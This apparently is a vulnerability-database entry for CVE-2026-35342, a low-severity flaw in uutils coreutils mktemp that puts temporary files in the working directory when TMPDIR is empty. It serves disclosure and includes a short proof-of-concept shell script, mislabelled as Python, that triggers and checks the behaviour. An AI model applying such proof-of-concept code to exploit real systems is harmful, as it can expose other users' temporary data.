CVE-2026-35342

Description

The mktemp utility in uutils coreutils fails to properly handle an empty TMPDIR environment variable. Unlike GNU mktemp, which falls back to /tmp when TMPDIR is an empty string, the uutils implementation treats the empty string as a valid path. This causes temporary files to be created in the current working directory (CWD) instead of the intended secure temporary directory. If the CWD is more permissive or accessible to other users than /tmp, it may lead to unintended information disclosure or unauthorized access to temporary data.

CVSS Details

CVSS Score

3.3

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:* - VULNERABLE

uutils coreutils < 0.6.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# PoC for CVE-2026-35342
# This script demonstrates the vulnerability where an empty TMPDIR
# causes mktemp to create a file in the current working directory.

mkdir -p /tmp/vuln_test_dir
cd /tmp/vuln_test_dir

# Simulate the vulnerable condition
export TMPDIR=""

# Run the vulnerable mktemp (assuming uutils version is used)
# If uutils is installed as 'mktemp', replace command accordingly
TEMP_FILE=$(mktemp)

echo "Created temp file: $TEMP_FILE"

# Verify if file is in CWD
if [ -f "$(basename $TEMP_FILE)" ]; then
    echo "[!] Vulnerability confirmed: File created in CWD."
    ls -l "$(basename $TEMP_FILE)"
else
    echo "[*] Safe behavior or PoC failed."
fi

# Cleanup
rm -f "$(basename $TEMP_FILE)"
cd -
rmdir /tmp/vuln_test_dir

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35342
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35342
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35342/
[4] VulDB https://vuldb.com/cve/CVE-2026-35342
[5] https://github.com/uutils/coreutils/pull/10566
[6] https://github.com/uutils/coreutils/releases/tag/0.6.0

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35342", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:36.217", "lastModified": "2026-05-04T20:11:32.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The mktemp utility in uutils coreutils fails to properly handle an empty TMPDIR environment variable. Unlike GNU mktemp, which falls back to /tmp when TMPDIR is an empty string, the uutils implementation treats the empty string as a valid path. This causes temporary files to be created in the current working directory (CWD) instead of the intended secure temporary directory. If the CWD is more permissive or accessible to other users than /tmp, it may lead to unintended information disclosure or unauthorized access to temporary data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-377"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.6.0", "matchCriteriaId": "87C33018-2E08-45B0-B69C-7FC224F7F883"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/pull/10566", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/uutils/coreutils/releases/tag/0.6.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}